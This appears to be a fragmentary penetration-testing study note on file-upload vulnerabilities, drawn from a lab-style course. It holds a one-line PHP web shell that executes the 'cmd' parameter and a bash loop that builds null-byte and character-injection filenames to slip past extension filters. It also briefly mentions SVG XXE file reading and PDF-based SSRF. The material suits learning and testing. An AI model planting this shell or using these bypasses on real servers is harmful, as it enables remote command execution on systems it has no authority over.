# File upload

```xml
<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>

The above configuration is how the web server determines which 
files to allow PHP code execution. It specifies a whitelist with a regex pattern 
that matches .phar, .php, and .phtml


wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt

php extensions:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FSsVSI02RUV7OwLF9JlAo%2Fimage.png?alt=media\&token=049cafd7-a0a1-4010-a3ed-c6d465d8c65f)

bypassing whitelist and blacklist

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F9RjGmwvgYUBIqEdf4bvH%2Fimage.png?alt=media\&token=5e192733-c410-48a7-ae81-c260a81f9b9c)

```
// Challenge:
server employs Client-Side, Blacklist, Whitelist, Content-Type, 
and MIME-Type filters to ensure the uploaded file is an image. 
Combine all of the attacks to bypass the filters and upload a PHP file

```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FN1tBlg1KiiUssn2ouRE4%2Fimage.png?alt=media\&token=8fc2e3b7-81e5-405e-8829-abd4be8bb1d4)

SVG XXE read file

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FLKR00lDLVeb7qg9OiI88%2Fimage.png?alt=media\&token=ee1cdfbb-964a-4865-a85e-d5f8b6a3067f)

```
// shell
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

```

FUzz Content-Type\
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FhEfLzgtscVAWOuyeFHKC%2Fimage.png?alt=media\&token=a01a3e4a-3e58-4903-822e-953d1e9e2d38)

```
// grab
Content-type
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

[!bash!]$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/Web/content-type.txt
[!bash!]$ cat content-type.txt | grep 'image/' > image-content-types.txt



We can write a small bash script that generates all permutations of the file name, 
where the above characters would be injected before and after both the PHP and 
JPG extensions, as follows:

Code: bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

```

Extensions Impact PDF : SSRF Blind XXE\
\
PDF\
html in pdf \
\<img src=<http://10.10.0.1/x?=imgtag>

<br>